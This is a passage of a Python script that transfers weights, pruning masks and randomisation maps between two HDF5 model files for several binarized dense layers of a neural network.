pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_24:0\"]\npret_c25= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_25:0\"]\npret_c26= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_26:0\"]\npret_c27= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_27:0\"]\npret_c28= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_28:0\"]\npret_c29= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_29:0\"]\npret_c30= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_30:0\"]\npret_c31= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_31:0\"]\npret_c32= pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_32:0\"]\npret_w1 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"Variable_33:0\"]\n\npret_rand_map_exp_0 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"rand_map_exp_0:0\"]\npret_rand_map_exp_1 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"rand_map_exp_1:0\"]\npret_rand_map_exp_2 = pretrained[\"model_weights\"][\"binary_dense_2\"][\"binary_dense_2\"][\"rand_map_exp_2:0\"]\n\nweight_shape = np.shape(bl_w1)\ntile_shape = np.shape(pret_c1)\nzero_fill = np.zeros(tile_shape)\none_fill = np.ones(tile_shape)\nneg_one_fill = -np.ones(tile_shape)\n\n# randomisation and pruning recovery\nbl_w1_unroll = np.array(bl_w1)\nbl_w1 = np.array(bl_w1)\n\nrand_map_0 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_0)\nrand_map_1 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_1)\nrand_map_2 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_2)\n\npruning_mask = np.array(bl_pruning_mask).astype(bool)\ninit_mask = np.logical_not(pruning_mask[rand_map_0])\npruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)]\npruning_mask = np.logical_or(pruning_mask, pruning_mask_recover)\ninit_mask = np.reshape(init_mask, tile_shape)\n\n# expand randomisation map across tiles\n\nrand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]])\nrand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]])\nrand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]])\nfor i in range(weight_shape[0]):\n rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n\nbl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand]\nbl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape)\n\nw1 = bl_w1\n\n# connect1 only\nc1 = one_fill\nc2 = neg_one_fill\nc3 = one_fill\nc4 = neg_one_fill\nc5 = one_fill\nc6 = neg_one_fill\nc7 = one_fill\nc8 = neg_one_fill\nc9 = one_fill\nc10 = neg_one_fill\nc11 = one_fill\nc12 = neg_one_fill\nc13 = one_fill\nc14 = neg_one_fill\nc15 = one_fill\nc16 = neg_one_fill\nc17 = neg_one_fill\nc18 = one_fill\nc19 = neg_one_fill\nc20 = one_fill\nc21 = neg_one_fill\nc22 = one_fill\nc23 = neg_one_fill\nc24 = one_fill\nc25 = neg_one_fill\nc26 = one_fill\nc27 = neg_one_fill\nc28 = one_fill\nc29 = neg_one_fill\nc30 = one_fill\nc31 = neg_one_fill\nc32 = one_fill\n\npret_w1 [...] = w1\npret_c1 [...] = c1\npret_c2 [...] = c2\npret_c3 [...] = c3\npret_c4 [...] = c4\npret_c5 [...] = c5\npret_c6 [...] = c6\npret_c7 [...] = c7\npret_c8 [...] = c8\npret_c9 [...] = c9\npret_c10[...] = c10\npret_c11[...] = c11\npret_c12[...] = c12\npret_c13[...] = c13\npret_c14[...] = c14\npret_c15[...] = c15\npret_c16[...] = c16\npret_c17[...] = c17\npret_c18[...] = c18\npret_c19[...] = c19\npret_c20[...] = c20\npret_c21[...] = c21\npret_c22[...] = c22\npret_c23[...] = c23\npret_c24[...] = c24\npret_c25[...] = c25\npret_c26[...] = c26\npret_c27[...] = c27\npret_c28[...] = c28\npret_c29[...] = c29\npret_c30[...] = c30\npret_c31[...] = c31\npret_c32[...] = c32\n\npret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float)\npret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float)\npret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float)\np_gamma[...] = np.array(bl_gamma)\npret_means[...] = np.array(bl_means)\npret_pruning_mask[...] = np.array(bl_pruning_mask)\n\nrand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float)\npret_rand_map_exp_0[...] = rand_map_0_expand\nrand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float)\npret_rand_map_exp_1[...] = rand_map_1_expand\nrand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float)\npret_rand_map_exp_2[...] = rand_map_2_expand\n\nprint(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))\n\n# dense layer 3\n\nbl_w1 = bl[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_1:0\"]\nbl_rand_map_0 = bl[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"rand_map_0:0\"]\nbl_pruning_mask = bl[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"pruning_mask:0\"]\nbl_gamma = bl[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable:0\"]\nbl_means = bl[\"model_weights\"][\"residual_sign_2\"][\"residual_sign_2\"][\"means:0\"]\npret_rand_map_0 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"rand_map_0:0\"]\npret_rand_map_1 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"rand_map_1:0\"]\npret_rand_map_2 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"rand_map_2:0\"]\npret_pruning_mask = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"pruning_mask:0\"]\np_gamma = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable:0\"]\npret_means = pretrained[\"model_weights\"][\"residual_sign_2\"][\"residual_sign_2\"][\"means:0\"]\n\npret_c1 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_1:0\"]\npret_c2 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_2:0\"]\npret_c3 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_3:0\"]\npret_c4 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_4:0\"]\npret_c5 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_5:0\"]\npret_c6 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_6:0\"]\npret_c7 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_7:0\"]\npret_c8 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_8:0\"]\npret_c9 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_9:0\"]\npret_c10= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_10:0\"]\npret_c11= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_11:0\"]\npret_c12= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_12:0\"]\npret_c13= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_13:0\"]\npret_c14= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_14:0\"]\npret_c15= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_15:0\"]\npret_c16= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_16:0\"]\npret_c17= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_17:0\"]\npret_c18= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_18:0\"]\npret_c19= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_19:0\"]\npret_c20= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_20:0\"]\npret_c21= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_21:0\"]\npret_c22= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_22:0\"]\npret_c23= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_23:0\"]\npret_c24= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_24:0\"]\npret_c25= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_25:0\"]\npret_c26= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_26:0\"]\npret_c27= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_27:0\"]\npret_c28= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_28:0\"]\npret_c29= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_29:0\"]\npret_c30= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_30:0\"]\npret_c31= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_31:0\"]\npret_c32= pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_32:0\"]\npret_w1 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"Variable_33:0\"]\n\npret_rand_map_exp_0 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"rand_map_exp_0:0\"]\npret_rand_map_exp_1 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"rand_map_exp_1:0\"]\npret_rand_map_exp_2 = pretrained[\"model_weights\"][\"binary_dense_3\"][\"binary_dense_3\"][\"rand_map_exp_2:0\"]\n\nweight_shape = np.shape(bl_w1)\ntile_shape = np.shape(pret_c1)\nzero_fill = np.zeros(tile_shape)\none_fill = np.ones(tile_shape)\nneg_one_fill = -np.ones(tile_shape)\n\n# randomisation and pruning recovery\nbl_w1_unroll = np.array(bl_w1)\nbl_w1 = np.array(bl_w1)\n\nrand_map_0 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_0)\nrand_map_1 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_1)\nrand_map_2 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_2)\n\npruning_mask = np.array(bl_pruning_mask).astype(bool)\ninit_mask = np.logical_not(pruning_mask[rand_map_0])\npruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)]\npruning_mask = np.logical_or(pruning_mask, pruning_mask_recover)\ninit_mask = np.reshape(init_mask, tile_shape)\n\n# expand randomisation map across tiles\n\nrand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]])\nrand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]])\nrand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]])\nfor i in range(weight_shape[0]):\n rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n\nbl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand]\nbl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape)\n\nw1 = bl_w1\n\n# connect1 only\nc1 = one_fill\nc2 = neg_one_fill\nc3 = one_fill\nc4 = neg_one_fill\nc5 = one_fill\nc6 = neg_one_fill\nc7 = one_fill\nc8 = neg_one_fill\nc9 = one_fill\nc10 = neg_one_fill\nc11 = one_fill\nc12 = neg_one_fill\nc13 = one_fill\nc14 = neg_one_fill\nc15 = one_fill\nc16 = neg_one_fill\nc17 = neg_one_fill\nc18 = one_fill\nc19 = neg_one_fill\nc20 = one_fill\nc21 = neg_one_fill\nc22 = one_fill\nc23 = neg_one_fill\nc24 = one_fill\nc25 = neg_one_fill\nc26 = one_fill\nc27 = neg_one_fill\nc28 = one_fill\nc29 = neg_one_fill\nc30 = one_fill\nc31 = neg_one_fill\nc32 = one_fill\n\npret_w1 [...] = w1\npret_c1 [...] = c1\npret_c2 [...] = c2\npret_c3 [...] = c3\npret_c4 [...] = c4\npret_c5 [...] = c5\npret_c6 [...] = c6\npret_c7 [...] = c7\npret_c8 [...] = c8\npret_c9 [...] = c9\npret_c10[...] = c10\npret_c11[...] = c11\npret_c12[...] = c12\npret_c13[...] = c13\npret_c14[...] = c14\npret_c15[...] = c15\npret_c16[...] = c16\npret_c17[...] = c17\npret_c18[...] = c18\npret_c19[...] = c19\npret_c20[...] = c20\npret_c21[...] = c21\npret_c22[...] = c22\npret_c23[...] = c23\npret_c24[...] = c24\npret_c25[...] = c25\npret_c26[...] = c26\npret_c27[...] = c27\npret_c28[...] = c28\npret_c29[...] = c29\npret_c30[...] = c30\npret_c31[...] = c31\npret_c32[...] = c32\n\npret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float)\npret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float)\npret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float)\np_gamma[...] = np.array(bl_gamma)\npret_means[...] = np.array(bl_means)\npret_pruning_mask[...] = np.array(bl_pruning_mask)\n\nrand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float)\npret_rand_map_exp_0[...] = rand_map_0_expand\nrand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float)\npret_rand_map_exp_1[...] = rand_map_1_expand\nrand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float)\npret_rand_map_exp_2[...] = rand_map_2_expand\n\nprint(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))\n\n# dense layer 4\n\nbl_w1 = bl[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_1:0\"]\nbl_rand_map_0 = bl[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"rand_map_0:0\"]\nbl_pruning_mask = bl[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"pruning_mask:0\"]\nbl_gamma = bl[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable:0\"]\nbl_means = bl[\"model_weights\"][\"residual_sign_3\"][\"residual_sign_3\"][\"means:0\"]\npret_rand_map_0 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"rand_map_0:0\"]\npret_rand_map_1 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"rand_map_1:0\"]\npret_rand_map_2 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"rand_map_2:0\"]\npret_pruning_mask = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"pruning_mask:0\"]\np_gamma = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable:0\"]\npret_means = pretrained[\"model_weights\"][\"residual_sign_3\"][\"residual_sign_3\"][\"means:0\"]\n\npret_c1 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_1:0\"]\npret_c2 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_2:0\"]\npret_c3 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_3:0\"]\npret_c4 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_4:0\"]\npret_c5 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_5:0\"]\npret_c6 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_6:0\"]\npret_c7 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_7:0\"]\npret_c8 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_8:0\"]\npret_c9 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_9:0\"]\npret_c10= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_10:0\"]\npret_c11= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_11:0\"]\npret_c12= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_12:0\"]\npret_c13= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_13:0\"]\npret_c14= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_14:0\"]\npret_c15= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_15:0\"]\npret_c16= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_16:0\"]\npret_c17= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_17:0\"]\npret_c18= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_18:0\"]\npret_c19= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_19:0\"]\npret_c20= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_20:0\"]\npret_c21= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_21:0\"]\npret_c22= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_22:0\"]\npret_c23= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_23:0\"]\npret_c24= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_24:0\"]\npret_c25= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_25:0\"]\npret_c26= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_26:0\"]\npret_c27= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_27:0\"]\npret_c28= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_28:0\"]\npret_c29= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_29:0\"]\npret_c30= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_30:0\"]\npret_c31= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_31:0\"]\npret_c32= pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_32:0\"]\npret_w1 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"Variable_33:0\"]\n\npret_rand_map_exp_0 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"rand_map_exp_0:0\"]\npret_rand_map_exp_1 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"rand_map_exp_1:0\"]\npret_rand_map_exp_2 = pretrained[\"model_weights\"][\"binary_dense_4\"][\"binary_dense_4\"][\"rand_map_exp_2:0\"]\n\nweight_shape = np.shape(bl_w1)\ntile_shape = np.shape(pret_c1)\nzero_fill = np.zeros(tile_shape)\none_fill = np.ones(tile_shape)\nneg_one_fill = -np.ones(tile_shape)\n\n# randomisation and pruning recovery\nbl_w1_unroll = np.array(bl_w1)\nbl_w1 = np.array(bl_w1)\n\nrand_map_0 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_0)\nrand_map_1 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_1)\nrand_map_2 = np.arange(tile_shape[0])\nnp.random.shuffle(rand_map_2)\n\npruning_mask = np.array(bl_pruning_mask).astype(bool)\ninit_mask = np.logical_not(pruning_mask[rand_map_0])\npruning_mask_recover = np.logical_and(pruning_mask, init_mask)[np.argsort(rand_map_0)]\npruning_mask = np.logical_or(pruning_mask, pruning_mask_recover)\ninit_mask = np.reshape(init_mask, tile_shape)\n\n# expand randomisation map across tiles\n\nrand_map_0_expand = np.tile(rand_map_0,[weight_shape[0]/tile_shape[0]])\nrand_map_1_expand = np.tile(rand_map_1,[weight_shape[0]/tile_shape[0]])\nrand_map_2_expand = np.tile(rand_map_2,[weight_shape[0]/tile_shape[0]])\nfor i in range(weight_shape[0]):\n rand_map_0_expand[i] = rand_map_0_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_0_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n rand_map_1_expand[i] = rand_map_1_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_1_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n rand_map_2_expand[i] = rand_map_2_expand[i] + (tile_shape[0]*(weight_shape[0]/tile_shape[0]-1)) * (rand_map_2_expand[i]/tile_shape[0]) + tile_shape[0]*(i%weight_shape[0]/tile_shape[0])\n\nbl_w1_rand_0 = bl_w1_unroll[rand_map_0_expand]\nbl_w1_rand_0 = np.reshape(bl_w1_rand_0, weight_shape)\n\nw1 = bl_w1\n\n# connect1 only\nc1 = one_fill\nc2 = neg_one_fill\nc3 = one_fill\nc4 = neg_one_fill\nc5 = one_fill\nc6 = neg_one_fill\nc7 = one_fill\nc8 = neg_one_fill\nc9 = one_fill\nc10 = neg_one_fill\nc11 = one_fill\nc12 = neg_one_fill\nc13 = one_fill\nc14 = neg_one_fill\nc15 = one_fill\nc16 = neg_one_fill\nc17 = neg_one_fill\nc18 = one_fill\nc19 = neg_one_fill\nc20 = one_fill\nc21 = neg_one_fill\nc22 = one_fill\nc23 = neg_one_fill\nc24 = one_fill\nc25 = neg_one_fill\nc26 = one_fill\nc27 = neg_one_fill\nc28 = one_fill\nc29 = neg_one_fill\nc30 = one_fill\nc31 = neg_one_fill\nc32 = one_fill\n\npret_w1 [...] = w1\npret_c1 [...] = c1\npret_c2 [...] = c2\npret_c3 [...] = c3\npret_c4 [...] = c4\npret_c5 [...] = c5\npret_c6 [...] = c6\npret_c7 [...] = c7\npret_c8 [...] = c8\npret_c9 [...] = c9\npret_c10[...] = c10\npret_c11[...] = c11\npret_c12[...] = c12\npret_c13[...] = c13\npret_c14[...] = c14\npret_c15[...] = c15\npret_c16[...] = c16\npret_c17[...] = c17\npret_c18[...] = c18\npret_c19[...] = c19\npret_c20[...] = c20\npret_c21[...] = c21\npret_c22[...] = c22\npret_c23[...] = c23\npret_c24[...] = c24\npret_c25[...] = c25\npret_c26[...] = c26\npret_c27[...] = c27\npret_c28[...] = c28\npret_c29[...] = c29\npret_c30[...] = c30\npret_c31[...] = c31\npret_c32[...] = c32\n\npret_rand_map_0[...] = np.reshape(rand_map_0, (-1,1)).astype(float)\npret_rand_map_1[...] = np.reshape(rand_map_1, (-1,1)).astype(float)\npret_rand_map_2[...] = np.reshape(rand_map_2, (-1,1)).astype(float)\np_gamma[...] = np.array(bl_gamma)\npret_means[...] = np.array(bl_means)\npret_pruning_mask[...] = np.array(bl_pruning_mask)\n\nrand_map_0_expand = np.reshape(rand_map_0_expand, [-1,1]).astype(float)\npret_rand_map_exp_0[...] = rand_map_0_expand\nrand_map_1_expand = np.reshape(rand_map_1_expand, [-1,1]).astype(float)\npret_rand_map_exp_1[...] = rand_map_1_expand\nrand_map_2_expand = np.reshape(rand_map_2_expand, [-1,1]).astype(float)\npret_rand_map_exp_2[...] = rand_map_2_expand\n\nprint(np.sum(np.array(bl_pruning_mask)), np.prod(np.shape(np.array(bl_pruning_mask))))\n\n# dense layer 5\n\nbl_w1 = bl[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_1:0\"]\nbl_rand_map_0 = bl[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"rand_map_0:0\"]\nbl_pruning_mask = bl[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"pruning_mask:0\"]\nbl_gamma = bl[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable:0\"]\nbl_means = bl[\"model_weights\"][\"residual_sign_4\"][\"residual_sign_4\"][\"means:0\"]\npret_rand_map_0 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"rand_map_0:0\"]\npret_rand_map_1 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"rand_map_1:0\"]\npret_rand_map_2 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"rand_map_2:0\"]\npret_pruning_mask = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"pruning_mask:0\"]\np_gamma = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable:0\"]\npret_means = pretrained[\"model_weights\"][\"residual_sign_4\"][\"residual_sign_4\"][\"means:0\"]\n\npret_c1 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_1:0\"]\npret_c2 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_2:0\"]\npret_c3 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_3:0\"]\npret_c4 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_4:0\"]\npret_c5 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_5:0\"]\npret_c6 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_6:0\"]\npret_c7 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_7:0\"]\npret_c8 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_8:0\"]\npret_c9 = pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_9:0\"]\npret_c10= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_10:0\"]\npret_c11= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_11:0\"]\npret_c12= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_12:0\"]\npret_c13= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_13:0\"]\npret_c14= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_14:0\"]\npret_c15= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_15:0\"]\npret_c16= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_16:0\"]\npret_c17= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_17:0\"]\npret_c18= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_18:0\"]\npret_c19= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_19:0\"]\npret_c20= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_20:0\"]\npret_c21= pretrained[\"model_weights\"][\"binary_dense_5\"][\"binary_dense_5\"][\"Variable_21:0\"]\npret_c22= 